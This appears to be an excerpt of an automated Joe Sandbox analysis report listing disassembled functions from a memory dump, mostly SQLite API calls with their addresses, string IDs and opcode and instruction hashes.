                                                                                                  • Opcode Fuzzy Hash: f8aed0544226ad359407b3c77e520ce91c63fa203a3cf3671ee0452ed86cd891
                                                                                                  • Instruction Fuzzy Hash: A211A0729157018FDB10DFB9E48854FBBE4FB89758F050D3AE959C7200EB30D8888BA2
                                                                                                  APIs
                                                                                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E751FF
                                                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E7540F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                  • String ID: BINARY$INTEGER
                                                                                                  • API String ID: 1477753154-1676293250
                                                                                                  APIs
                                                                                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E45980
                                                                                                    • Part of subcall function 61E13056: sqlite3_mutex_try.SQLITE3(?,?,?,61E130D6), ref: 61E12FF6
                                                                                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E45999
                                                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E45AB2
                                                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E45EBD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_mutex_try
                                                                                                  • String ID:
                                                                                                  • API String ID: 2068833801-0
                                                                                                  APIs
                                                                                                  • sqlite3_bind_int64.SQLITE3 ref: 61E2B260
                                                                                                    • Part of subcall function 61E2B08E: sqlite3_mutex_leave.SQLITE3 ref: 61E2B0CD
                                                                                                  • sqlite3_bind_double.SQLITE3 ref: 61E2B283
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_bind_doublesqlite3_bind_int64sqlite3_mutex_leave
                                                                                                  • String ID:
                                                                                                  • API String ID: 1465616180-0
                                                                                                  APIs
                                                                                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E2B31F
                                                                                                  • sqlite3_bind_zeroblob.SQLITE3 ref: 61E2B344
                                                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E2B364
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_bind_zeroblobsqlite3_mutex_entersqlite3_mutex_leave
                                                                                                  • String ID:
                                                                                                  • API String ID: 2187339821-0
                                                                                                  APIs
                                                                                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E10092
                                                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E100F5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                  • String ID:
                                                                                                  • API String ID: 1477753154-0
                                                                                                  APIs
                                                                                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E0FFCA
                                                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E10015
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                  • String ID:
                                                                                                  • API String ID: 1477753154-0
                                                                                                  APIs
                                                                                                    • Part of subcall function 61E2AD2A: sqlite3_log.SQLITE3 ref: 61E2AD58
                                                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E2AEE2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_logsqlite3_mutex_leave
                                                                                                  • String ID:
                                                                                                  • API String ID: 1465156292-0
                                                                                                  APIs
                                                                                                    • Part of subcall function 61E2AD2A: sqlite3_log.SQLITE3 ref: 61E2AD58
                                                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E2B193
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_logsqlite3_mutex_leave
                                                                                                  • String ID:
                                                                                                  • API String ID: 1465156292-0
                                                                                                  APIs
                                                                                                    • Part of subcall function 61E2AD2A: sqlite3_log.SQLITE3 ref: 61E2AD58
                                                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E2B20F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_log, sqlite3_mutex_leave
                                                                                                  • String ID:
                                                                                                  • API String ID: 1465156292-0
                                                                                                  APIs
                                                                                                    • Part of subcall function 61E2AD2A: sqlite3_log.SQLITE3 ref: 61E2AD58
                                                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E2B07F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_log, sqlite3_mutex_leave
                                                                                                  • String ID:
                                                                                                  • API String ID: 1465156292-0
                                                                                                  APIs
                                                                                                    • Part of subcall function 61E2AD2A: sqlite3_log.SQLITE3 ref: 61E2AD58
                                                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E2B0CD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_log, sqlite3_mutex_leave
                                                                                                  • String ID:
                                                                                                  • API String ID: 1465156292-0
                                                                                                  APIs
                                                                                                    • Part of subcall function 61E2AD2A: sqlite3_log.SQLITE3 ref: 61E2AD58
                                                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E2B126
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_log, sqlite3_mutex_leave
                                                                                                  • String ID:
                                                                                                  • API String ID: 1465156292-0
                                                                                                  APIs
                                                                                                  • sqlite3_bind_int64.SQLITE3 ref: 61E2B0FC
                                                                                                    • Part of subcall function 61E2B08E: sqlite3_mutex_leave.SQLITE3 ref: 61E2B0CD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_bind_int64, sqlite3_mutex_leave
                                                                                                  • String ID:
                                                                                                  • API String ID: 3064317574-0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_free$sqlite3_snprintf$sqlite3_mutex_entersqlite3_win32_is_nt
                                                                                                  • String ID: \$winFullPathname1$winFullPathname2$winFullPathname3$winFullPathname4
                                                                                                  • API String ID: 3752053736-2111127023
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: memcmp$sqlite3_mprintf$sqlite3_malloc64$sqlite3_freesqlite3_vfs_find
                                                                                                  • String ID: ra$@$Hra$access$cache
                                                                                                  • API String ID: 1538829708-202465084
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_free$sqlite3_malloc64sqlite3_mprintf$sqlite3_snprintf$sqlite3_mutex_entersqlite3_mutex_leavesqlite3_strnicmp
                                                                                                  • String ID: .$sqlite3_extension_init$te3_
                                                                                                  • API String ID: 2803375525-613441610
                                                                                                  APIs
                                                                                                  • sqlite3_stricmp.SQLITE3 ref: 61E26778
                                                                                                  • sqlite3_value_numeric_type.SQLITE3 ref: 61E26784
                                                                                                  • sqlite3_value_int.SQLITE3 ref: 61E26791
                                                                                                  • sqlite3_stricmp.SQLITE3 ref: 61E267B9
                                                                                                  • sqlite3_value_numeric_type.SQLITE3 ref: 61E267C5
                                                                                                  • sqlite3_value_int.SQLITE3 ref: 61E267D4
                                                                                                  • sqlite3_stricmp.SQLITE3 ref: 61E267F4
                                                                                                  • sqlite3_value_numeric_type.SQLITE3 ref: 61E26800
                                                                                                  • sqlite3_value_int.SQLITE3 ref: 61E2680F
                                                                                                  • sqlite3_stricmp.SQLITE3 ref: 61E2683B
                                                                                                  • sqlite3_value_numeric_type.SQLITE3 ref: 61E26847
                                                                                                  • sqlite3_value_int.SQLITE3 ref: 61E26855
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_stricmpsqlite3_value_intsqlite3_value_numeric_type
                                                                                                  • String ID:
                                                                                                  • API String ID: 2723203140-0
                                                                                                  APIs
                                                                                                  • sqlite3_str_append.SQLITE3 ref: 61E33A24
                                                                                                  • sqlite3_str_append.SQLITE3 ref: 61E33A3A
                                                                                                  • sqlite3_str_append.SQLITE3 ref: 61E33A7F
                                                                                                  • sqlite3_str_appendf.SQLITE3 ref: 61E33AA9
                                                                                                    • Part of subcall function 61E2B374: sqlite3_str_vappendf.SQLITE3 ref: 61E2B38E
                                                                                                  • sqlite3_str_append.SQLITE3 ref: 61E33B0C
                                                                                                  • sqlite3_str_appendf.SQLITE3 ref: 61E33BAF
                                                                                                  • sqlite3_str_appendf.SQLITE3 ref: 61E33C57
                                                                                                  • sqlite3_str_appendf.SQLITE3 ref: 61E33C8F
                                                                                                  • sqlite3_str_append.SQLITE3 ref: 61E33CB4
                                                                                                  • sqlite3_str_appendf.SQLITE3 ref: 61E33CED
                                                                                                  • sqlite3_str_append.SQLITE3 ref: 61E33D0D
                                                                                                  • sqlite3_str_reset.SQLITE3 ref: 61E33D29
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_str_append$sqlite3_str_appendf$sqlite3_str_resetsqlite3_str_vappendf
                                                                                                  • String ID: d
                                                                                                  • API String ID: 4035452181-2564639436
                                                                                                  • Opcode ID: 98330da2d2f786052cfc6635dcab9114b8db3d63f28d89e8bddd1513b81f9406
                                                                                                  • Instruction ID: 665d34b4af49c3cd5a827462a45b2d3ae8819350e6968956d68ab023ee65e7f8
                                                                                                  • Opcode Fuzzy Hash: 98330da2d2f786052cfc6635dcab9114b8db3d63f28d89e8bddd1513b81f9406
                                                                                                  • Instruction Fuzzy Hash: B7A1F6B09093659FEB20CF59C880B99BBF0AF85304F24C99ED488AB251D775D985CF52
                                                                                                  APIs
                                                                                                  • sqlite3_str_append.SQLITE3 ref: 61E23854
                                                                                                  • sqlite3_str_append.SQLITE3 ref: 61E23871
                                                                                                  • sqlite3_str_append.SQLITE3 ref: 61E23896
                                                                                                  • sqlite3_str_appendall.SQLITE3 ref: 61E238D4
                                                                                                  • sqlite3_str_append.SQLITE3 ref: 61E238F7
                                                                                                  • sqlite3_str_append.SQLITE3 ref: 61E2390E
                                                                                                  • sqlite3_str_append.SQLITE3 ref: 61E2392B
                                                                                                  • sqlite3_str_append.SQLITE3 ref: 61E2394D
                                                                                                  • sqlite3_str_append.SQLITE3 ref: 61E23966
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_str_append$sqlite3_str_appendall
                                                                                                  • String ID: <expr>$rowid
                                                                                                  • API String ID: 851024535-2606092651
                                                                                                  • Opcode ID: 4d31edcbe2cd69ac9767798eac5b3aa218a2de775f6837a28b47fca173f6ffa0
                                                                                                  • Instruction ID: 3f44b9961fe872e3890dc8435bf9f45010e5b58887dcd78829793586ea9ca391
                                                                                                  • Opcode Fuzzy Hash: 4d31edcbe2cd69ac9767798eac5b3aa218a2de775f6837a28b47fca173f6ffa0
                                                                                                  • Instruction Fuzzy Hash: 694156B49087059BCB04DF69C5D169EBBE0BB88748F24CD2DE8994B390D776D8818F42
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: strncmp
                                                                                                  • String ID: -$-$0$]$false$null$true$}
                                                                                                  • API String ID: 1114863663-1443276563
                                                                                                  • Opcode ID: 6bdbc10b6e08e433de89a79e71cf95decf08c0e9f742c35de295bfcd7d61d190
                                                                                                  • Instruction ID: bc763faa6251271fa7e5d496301736fcb2434da925db5e29f4af3b085ec4c853
                                                                                                  • Opcode Fuzzy Hash: 6bdbc10b6e08e433de89a79e71cf95decf08c0e9f742c35de295bfcd7d61d190
                                                                                                  • Instruction Fuzzy Hash: FED1E670A0CA468EE713CFAAC442799BBF2BF05318F6CC55AE4A197B89C339D446C751
                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 2313487548-0
                                                                                                  • Opcode ID: f0b11a29783efd7e7c8c14ce528e1fd951f247dcb29d9c1997e282895af9f18b
                                                                                                  • Instruction ID: 755c6084426158ed5d91e3566ae4d0f48e8097a4fdfb5aec262eee5d34d220ca
                                                                                                  • Opcode Fuzzy Hash: f0b11a29783efd7e7c8c14ce528e1fd951f247dcb29d9c1997e282895af9f18b
                                                                                                  • Instruction Fuzzy Hash: 5E119DB4A587418BCB80AF78C0C4519FBE5EF88315B52889DDC88CF305D775D8A1CB91
                                                                                                  APIs
                                                                                                  • sqlite3_malloc64.SQLITE3 ref: 61E75544
                                                                                                  • sqlite3_exec.SQLITE3 ref: 61E75577
                                                                                                  • sqlite3_free_table.SQLITE3 ref: 61E75591
                                                                                                  • sqlite3_free.SQLITE3 ref: 61E755A5
                                                                                                  • sqlite3_mprintf.SQLITE3 ref: 61E755B8
                                                                                                  • sqlite3_free.SQLITE3 ref: 61E755C5
                                                                                                  • sqlite3_free.SQLITE3 ref: 61E755DE
                                                                                                    • Part of subcall function 61E09DA3: sqlite3_mutex_enter.SQLITE3 ref: 61E09DC2
                                                                                                  • sqlite3_free_table.SQLITE3 ref: 61E755F3
                                                                                                    • Part of subcall function 61E09F67: sqlite3_free.SQLITE3 ref: 61E09F95
                                                                                                  • sqlite3_realloc64.SQLITE3 ref: 61E75617
                                                                                                  • sqlite3_free_table.SQLITE3 ref: 61E75629
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_free$sqlite3_free_table$sqlite3_execsqlite3_malloc64sqlite3_mprintfsqlite3_mutex_entersqlite3_realloc64
                                                                                                  • String ID:
                                                                                                  • API String ID: 3621699333-0
                                                                                                  • Opcode ID: 681b439c2df7b0fcd8d82009647d213dd0f0d3c9cff520648b60e1d3e1acdd1c
                                                                                                  • Instruction ID: fd9f83ecbe410c01a313c88d75176e8e9b49f4ab152912af1e288474d7920152
                                                                                                  • Opcode Fuzzy Hash: 681b439c2df7b0fcd8d82009647d213dd0f0d3c9cff520648b60e1d3e1acdd1c
                                                                                                  • Instruction Fuzzy Hash: 7F51B2B49053499BEB10DFA8D584B9EBBF1FF84308F208429E854AB340D779E850CF91
                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_freesqlite3_malloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 423083942-0
                                                                                                  • Opcode ID: e5e8ed34cfa1df38ea00753311fa879d79d8548ec2877f36c65d0a78c8bc2532
                                                                                                  • Instruction ID: 774842dca3a7b23ba9098b7aaa30b2ff1ec5719cad4ff7753127fd75edc15362
                                                                                                  • Opcode Fuzzy Hash: e5e8ed34cfa1df38ea00753311fa879d79d8548ec2877f36c65d0a78c8bc2532
                                                                                                  • Instruction Fuzzy Hash: A202E974A49289CFDB04CFA8C581AADBBF2BF88314F258559D815AB329D730E845CF90
                                                                                                  APIs
                                                                                                  • sqlite3_value_text.SQLITE3 ref: 61E271F6
                                                                                                  • sqlite3_result_error_toobig.SQLITE3 ref: 61E272D7
                                                                                                  • sqlite3_result_error_nomem.SQLITE3 ref: 61E272FD
                                                                                                  • sqlite3_snprintf.SQLITE3 ref: 61E27579
                                                                                                  • sqlite3_snprintf.SQLITE3 ref: 61E275A6
                                                                                                  • sqlite3_snprintf.SQLITE3 ref: 61E275B0
                                                                                                  • sqlite3_snprintf.SQLITE3 ref: 61E27616
                                                                                                  • sqlite3_result_text.SQLITE3 ref: 61E27739
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_snprintf$sqlite3_result_error_nomemsqlite3_result_error_toobigsqlite3_result_textsqlite3_value_text
                                                                                                  • String ID:
                                                                                                  • API String ID: 2444656285-0
                                                                                                  • Opcode ID: 13c9f4abfe8d5cebd01134be04a38e19ab0229d85707aec9553534cb700e836b
                                                                                                  • Instruction ID: 5994e3254eeef7e10fce3f09ece7705fa91c434df33f790ca7c769dd0499c4de
                                                                                                  • Opcode Fuzzy Hash: 13c9f4abfe8d5cebd01134be04a38e19ab0229d85707aec9553534cb700e836b
                                                                                                  • Instruction Fuzzy Hash: 85E19FB5D4835ACFDB208F58C8A0799BBF0BF56318F25C899D898A7344D734D9828F42
                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_snprintf$sqlite3_result_textsqlite3_result_value
                                                                                                  • String ID:
                                                                                                  • API String ID: 336169149-0
                                                                                                  • Opcode ID: 46ebdda8d4aef807e37125267e542ff61a555965f328b42af6b305b9235a9ac5
                                                                                                  • Instruction ID: b2bec1aa2aa06a88faab86db98da8f06bc74788f178ef6d3e6112113e51fb7b9
                                                                                                  • Opcode Fuzzy Hash: 46ebdda8d4aef807e37125267e542ff61a555965f328b42af6b305b9235a9ac5
                                                                                                  • Instruction Fuzzy Hash: 3561F3B0A083868FD7019F68C8A079ABFE2AF95318F28C95CD4C98B395D735C845CB42
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_get_auxdata$memcmpsqlite3_freesqlite3_mallocsqlite3_result_error_nomemsqlite3_set_auxdatasqlite3_value_bytessqlite3_value_text
                                                                                                  • String ID:
                                                                                                  • API String ID: 1733351873-0
                                                                                                  • Opcode ID: 27ba6a7ff9bc66825ba48da0b545964acf9c2ae77fe968f884774e85edb77aa2
                                                                                                  • Instruction ID: de325be661a98a2f84987773780815510347e568cddbbcc963d86352d16293be
                                                                                                  • Opcode Fuzzy Hash: 27ba6a7ff9bc66825ba48da0b545964acf9c2ae77fe968f884774e85edb77aa2
                                                                                                  • Instruction Fuzzy Hash: 8851E4B0E042598FCB40DFA9C49069EBBF1AF4D314F24C66AD855EB304E735D8528F51
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memcmp$sqlite3_free$sqlite3_malloc64
                                                                                                  • String ID: 0
                                                                                                  • API String ID: 3361124181-4108050209
                                                                                                  • Opcode ID: c89378d471feb7345ba14a29a8fca3d24c9a6ed8e935f74fc64e46c615daa88c
                                                                                                  • Instruction ID: 8c9dc45c2d26cc3314bdd5abb124e39ffa3e8b68e4d3cb32c5b43cabb391bd20
                                                                                                  • Opcode Fuzzy Hash: c89378d471feb7345ba14a29a8fca3d24c9a6ed8e935f74fc64e46c615daa88c
                                                                                                  • Instruction Fuzzy Hash: 65E13070A043698FDB11CFA8C88079DBBF1AF89318F65856AD859AB345E734D886CF41
                                                                                                  APIs
                                                                                                  • sqlite3_step.SQLITE3(?,?,?,?,?,?,?,00000004,?,?,61E7CECA), ref: 61E7C5C4
                                                                                                  • sqlite3_finalize.SQLITE3 ref: 61E7C644
                                                                                                  • sqlite3_finalize.SQLITE3 ref: 61E7C693
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_finalize$sqlite3_step
                                                                                                  • String ID: integer$null$real
                                                                                                  • API String ID: 2395141310-2769304496
                                                                                                  • Opcode ID: c160f6475af13f3792a7955bae019c26f1b04d2c9282ef96144353d39dab8bea
                                                                                                  • Instruction ID: ab73cd4464e232efc6068817c2dbb65267d58ddef041d78221729ecbe3c31867
                                                                                                  • Opcode Fuzzy Hash: c160f6475af13f3792a7955bae019c26f1b04d2c9282ef96144353d39dab8bea
                                                                                                  • Instruction Fuzzy Hash: 4A51E7B0A047568FDB14DFA9C480A5ABBF5BF88714F25C96DD848AB315D378E840CBA1
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Virtual$ProtectQueryabortfwritevfprintf
                                                                                                  • String ID: @
                                                                                                  • API String ID: 1503958624-2766056989
                                                                                                  • Opcode ID: 807b495b28b03be4d396e31a65b89b58737f7bdecfd5b861c2b8b39ba3db2c54
                                                                                                  • Instruction ID: a0de617ab0917094f34eb4f8007555d36275dea332b47e3c0db7e93c06bb4240
                                                                                                  • Opcode Fuzzy Hash: 807b495b28b03be4d396e31a65b89b58737f7bdecfd5b861c2b8b39ba3db2c54
                                                                                                  • Instruction Fuzzy Hash: F14112B5A147419FEB10DF68C58461ABBE4BF85364F94C91CE899DB350E730E8848B92
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_freesqlite3_mutex_entersqlite3_randomness$sqlite3_malloc64sqlite3_mutex_leave
                                                                                                  • String ID:
                                                                                                  • API String ID: 1657278834-0
                                                                                                  • Opcode ID: fbedb8660bbb0ad3e57053b1680335ed9b12db248aad2de5f595c345e39a6b3a
                                                                                                  • Instruction ID: 780649902df650684f158bb957af1da0b66518050d94f8a49ce11094842617fc
                                                                                                  • Opcode Fuzzy Hash: fbedb8660bbb0ad3e57053b1680335ed9b12db248aad2de5f595c345e39a6b3a
                                                                                                  • Instruction Fuzzy Hash: 45B16875A0564A8FCF40CFA9D48069DB7F1FF8A314F28C429E828AB345D778E945CB50
                                                                                                  APIs
                                                                                                    • Part of subcall function 61E2ABED: sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 61E2AC31
                                                                                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E61D3A
                                                                                                  • sqlite3_prepare_v2.SQLITE3 ref: 61E61D78
                                                                                                  • sqlite3_step.SQLITE3 ref: 61E61DCD
                                                                                                  • sqlite3_errmsg.SQLITE3 ref: 61E61F6A
                                                                                                    • Part of subcall function 61E27C83: sqlite3_log.SQLITE3 ref: 61E27CAC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_log$sqlite3_errmsgsqlite3_mutex_entersqlite3_prepare_v2sqlite3_step
                                                                                                  • String ID:
                                                                                                  • API String ID: 154587148-0
                                                                                                  • Opcode ID: 70d14fd3d2e8eb9be4cf7663d6139740a904a0fbed048c508a162cbdbf9578b4
                                                                                                  • Instruction ID: f26c7ee43f3adffec19d40859398e03c1db5ac104f24a00d7dd95a3f76694606
                                                                                                  • Opcode Fuzzy Hash: 70d14fd3d2e8eb9be4cf7663d6139740a904a0fbed048c508a162cbdbf9578b4
                                                                                                  • Instruction Fuzzy Hash: 0B8107B0E4524A8BDB01DFE9C98079EBBF9AFD9308F64C429E854E7350D738D8418B91
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
